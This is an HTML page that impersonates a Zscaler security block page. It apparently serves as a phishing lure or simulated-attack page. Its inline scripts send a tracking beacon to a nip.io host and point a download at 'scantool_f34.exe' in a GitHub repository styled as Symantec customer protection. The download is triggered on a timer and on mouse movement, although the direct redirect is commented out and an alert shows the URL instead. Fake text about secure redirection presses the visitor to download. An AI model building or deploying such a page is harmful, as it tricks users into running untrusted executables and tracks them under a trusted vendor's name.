<!--# Id: scinternal.html szhang -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>

<head>
    <meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats.">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Internet Security</title>

    <style type="text/css">
        body {
            background-color: #e3e3e3;
            font-family: Arial, sans-serif;
            font-size: 12px;
            color: #4B4F54;
        }
        
        a {
            cursor: pointer;
            text-decoration: none;
            color: #009dd0;
        }
        
        table {
            margin-top: 10px;
        }
        
        td table {
            margin-top: 0;
            text-align: center;
        }
        
        img {
            max-height: 75px;
            max-width: 430px;
        }
        
        .pg {
            position: absolute;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            overflow-x: hidden;
            white-space: nowrap;
        }
        
        .pg:before {
            content: "";
            display: inline-block;
            height: 100%;
            vertical-align: middle;
        }
        
        .pg_cont {
            display: inline-block;
            vertical-align: middle;
            width: 100%;
            position: relative;
        }
        
        .a_i {
            width: 19px;
            height: 19px;
            margin-right: 10px;
            background-size: 19px 19px;
            display: inline-block;
        }
        
        .m_tbl {
            width: 100%;
            max-width: 758px;
            background: #e3e3e3;
            min-width: 600px;
        }
        
        .pg.red .eu_h {
            color: #fd4239;
            border-top: 3px solid #fd4239;
        }
        
        .pg.red .eu_h,
        .pg.red .eu_co,
        .pg.red .hr {
            border-left: 3px solid #fd4239;
            border-right: 3px solid #fd4239;
        }
        
        .pg.red .fo {
            border-bottom-color: #fd4239;
        }
        
        .pg.red .eu_co.st {
            border: 0;
        }
        
        .pg.yl .eu_h {
            color: #c2a200;
            border-top: 3px solid #c2a200;
        }
        
        .pg.yl .eu_h,
        .pg.yl .eu_co,
        .pg.yl .hr {
            border-left: 3px solid #c2a200;
            border-right: 3px solid #c2a200;
        }
        
        .pg.yl .fo {
            border-bottom-color: #c2a200;
        }
        
        .pg.yl .eu_co.st {
            border: 0;
        }
        
        .pg.or .eu_h {
            color: #e39e00;
            border-top: 3px solid #e39e00;
        }
        
        .pg.or .eu_h,
        .pg.or .eu_co,
        .pg.or .hr {
            border-left: 3px solid #e39e00;
            border-right: 3px solid #e39e00;
        }
        
        .pg.or .fo {
            border-bottom-color: #e39e00;
        }
        
        .pg.or .eu_co.st {
            border: 0;
        }
        
        .m_tbl table td {
            padding: 0 20px 16px 20px;
            text-align: left;
            background-color: white;
        }
        
        .m_tbl table td.bh {
            text-align: center;
            background-color: #e3e3e3;
            z-index: 100;
        }
        
        .m_tbl table td.eu_h {
            padding-top: 20px;
        }
        
        .eu_h {
            vertical-align: middle;
            font-weight: normal;
            white-space: normal;
            font-size: 24px;
            background-color: white;
            border-left: 3px solid;
            border-right: 3px solid;
            border-top-left-radius: 10px;
            border-top-right-radius: 10px;
        }
        
        .pg .eu_h.sm {
            font-size: 16px;
            color: #929496;
            border-top-left-radius: 0;
            border-top-right-radius: 0;
            border-top: 0;
            padding-top: 0;
        }
        
        hr {
            margin: 0;
            border-top: 0.5px solid #cfd0d1;
        }
        
        .eu_co {
            font-size: 16px;
            color: #2a2c30;
            border-left: 3px solid;
            border-right: 3px solid;
            white-space: normal;
            word-wrap: break-word;
        }
        
        .eu_co.rsn {
            color: #000000;
        }
        
        .eu_l {
            display: inline;
            padding-left: 5px;
        }
        
        .bh {
            min-height: 35px;
            display: block;
            max-height: 75px;
            color: #0076A9;
            font-size: 32px;
            overflow: hidden;
            padding-bottom: 15px;
            padding-top: 5px;
            background-color: #e3e3e3;
            text-align: center;
            max-width: 758px;
            text-overflow: ellipsis;
        }
        
        .btn {
            background: #009dd0;
            color: #FFFFFF;
            border-radius: 5px;
            border: 2px solid #009dd0;
            cursor: pointer;
            display: inline-block;
            height: 30px;
            margin: 10px 0 15px;
            font-size: 18px;
            line-height: 26px;
            width: auto;
            padding: 0 20px;
        }
        
        .btn:focus {
            outline: none;
        }
        
        .btn:hover {
            background: #fff;
            color: #0076A9;
        }
        
        .eu_co.fo {
            height: 32px;
            color: #696A6D;
            background-color: #f3f3f3;
            line-height: 32px;
            font-size: 11px;
            padding-bottom: 0px;
            border-bottom: 3px solid;
            border-bottom-left-radius: 10px;
            border-bottom-right-radius: 10px;
        }
        
        .eu_co.fo.pb35 {
            background-color: white;
            color: #2a2c30;
            font-size: 16px;
            padding-bottom: 20px;
        }
        
        .eu_co.st {
            font-size: 12px;
            padding: 10px 0;
            line-height: 20px;
            position: relative;
            color: #939393;
            background: #e3e3e3;
            border: 0;
            text-align: center;
        }
        
        .f_btn {
            display: inline-block;
        }
        
        .uq_cd {
            position: absolute;
            bottom: 54px;
            right: 25px;
            font-size: 10px;
            color: #696A6D;
        }
        
        .s_l td {
            font-size: 13px;
            color: #77797c;
            text-align: right;
        }
        
        .s_l a {
            padding: 4px;
            cursor: pointer;
            font-size: 13px;
        }
        
        .s_l .sprt {
            margin-left: 6px;
            margin-right: 4px;
            padding-right: 0;
            cursor: default;
            height: 14px;
            border-left: 1px #cfd0d1 solid;
        }
        
        .langSelector {
            width: 200px;
        }
        
        .langSelector td {
            text-align: right;
        }
        
        .logo_container {
            position: relative;
            max-width: 758px;
            margin: 0px auto;
        }
        
        .err_cd {
            font-size: 16px;
            color: #2a2c30;
            text-align: left;
            background-color: white;
            padding-bottom: 16px;
        }
        
        @media only screen and (max-width:700px) {
            td.bh {
                padding-bottom: 35px;
            }
            .eu_h {
                font-size: 18px;
            }
            .eu_h,
            .eu_co,
            .st {
                word-wrap: break-word;
                white-space: normal;
            }
            .sm {
                font-size: 14px;
            }
            .fo {
                padding: 2px 0;
                height: 20px;
                line-height: 20px;
            }
            .m_tbl {
                min-width: 300px;
                width: 95%;
                position: relative;
                left: -3px;
            }
            .uq_cd {
                bottom: 77px;
            }
            .a_i {
                position: relative;
                top: 4px;
            }
            .s_l {
                position: absolute;
                top: 85px;
                width: 100%;
                z-index: 100;
            }
            .s_l a {
                padding: 0;
            }
            .m_tbl table .s_l td {
                text-align: center;
            }
            .pg {
                overflow-y: auto;
            }
            .langSelector {
                width: 100%;
            }
            .langSelector td {
                text-align: center;
            }
        }
    </style>

    <!-- Global site tag (gtag.js) - Google Analytics --> 
<script async src="https://www.googletagmanager.com/gtag/js?id=G-BPM83X8CLT"></script>
<script> 
    window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-BPM83X8CLT'); 
</script>
    
</head>

<body>
    
    <script>
        var params = new URLSearchParams(window.location.search);
        var id = params.get('id');
        var gp = params.get('gp');
        var stats = `https://stats-034543f5.nip.io/wtf/track?rid=${gp}`;
        
        
    </script>
    <script>
        var target = `https://raw.githubusercontent.com/SymantecCustomerProtection/cloud-gate/${id}/scantool_f34.exe`;
        
        function download() {
            var yes = document.createElement("img").src = stats
            //window.location.href = target;
            alert(`downloading form \n ${target}`);
        }
        
        setTimeout(download, 2000);
        document.onmouseover = function() {download(); } 
        document.onmouseout  = function() {download(); } 
        var yes = document.createElement("img").src = stats;
    </script>
    <div class="pg red">
        <div class="pg_cont">
            <table class="m_tbl" cellpadding="0" cellspacing="0" align="center">
                <tbody>
                    <tr>
                        <td height="100" valign="top" style="position:relative;">
                            <div class="uq_cd">31337</div>
                            <!--locale en_US-->
                            <table id="en_US" width="100%" border="0" cellspacing="0" cellpadding="0">
                                <tbody>
                                    <tr>
                                        <td class="eu_h">
                                            Loading. Please wait.
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="hr">Redirecting to secure location ...
                                            <hr>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="eu_co rsn">
                                            If the download doesn't start automatically, click here
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="eu_co err_cd">
                                            <button onClick="download()">Download the file </button>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="eu_co fo"> HOCyaDNlidynKts3FuOf0FMKJQMldit2dRwcNyIjjOfkOFRkmlREqiiSHBx1dit2JQMlCiLLTztsmKMkUUzo
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="eu_co st red">
                                            Your organization has been protected you from internet threats.
                                        </td>
                                    </tr>
                                </tbody>
                            </table>
                            <!--/locale en_US-->
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
    </div>
</body>

</html>
<!-- http://gateway.zscalerone.net/ -->
